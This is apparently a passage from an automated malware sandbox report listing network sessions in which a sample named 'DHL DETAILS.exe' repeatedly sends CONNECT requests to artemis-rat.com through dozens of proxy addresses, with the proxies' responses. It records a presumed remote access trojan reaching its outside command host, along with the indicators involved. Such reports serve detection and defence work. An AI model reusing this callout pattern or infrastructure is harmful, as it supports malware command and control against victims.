                                                                                    Mar 9, 2024 13:14:17.484246969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.649266958 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1163192.168.2.553477138.68.60.831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.484950066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.683079004 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1164192.168.2.553490104.238.111.107283946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.485989094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.973892927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.552555084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.568074942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.591275930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1165192.168.2.55360949.51.93.2224436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.486707926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1166192.168.2.553453103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.489634037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1167192.168.2.551581195.169.35.21431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.523550987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.536587954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1168192.168.2.553261216.176.187.9988896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.527332067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.734740019 CET68INHTTP/1.1 200 Connection established
                                                                                    Set-Cookie: SRV=S10; path=/


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1169192.168.2.55345434.95.243.12280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.543315887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1170192.168.2.55313247.243.114.19281806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.546056986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1171192.168.2.553499162.159.242.10806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.547574997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.708358049 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1172192.168.2.553510104.27.122.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.551847935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.706331968 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1173192.168.2.55345751.15.247.93163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.555135012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1174192.168.2.553525104.18.136.28806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.559185982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.713515997 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1175192.168.2.55351374.48.7.43806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.560137987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1176192.168.2.55345545.118.132.180454496352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.562392950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1177192.168.2.551617109.87.130.656786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.566019058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1178192.168.2.553479181.78.74.789996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.644366026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.917359114 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1179192.168.2.553552104.20.75.31806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.644515991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.798582077 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1180192.168.2.553553104.27.37.131806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.644830942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.799024105 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1181192.168.2.553556185.162.228.128806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.645190001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.799530983 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1182192.168.2.55302598.162.25.7316536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.645365953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1183192.168.2.553561104.20.51.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.648065090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.802289963 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1184192.168.2.55332072.49.49.11310346352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.648610115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1185192.168.2.553557162.159.242.159806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.648895025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.810034037 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1186192.168.2.55159591.134.140.160122176352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.653218985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.130011082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.723995924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724106073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.520968914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1187192.168.2.553459145.239.199.241806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.653280973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.962383986 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
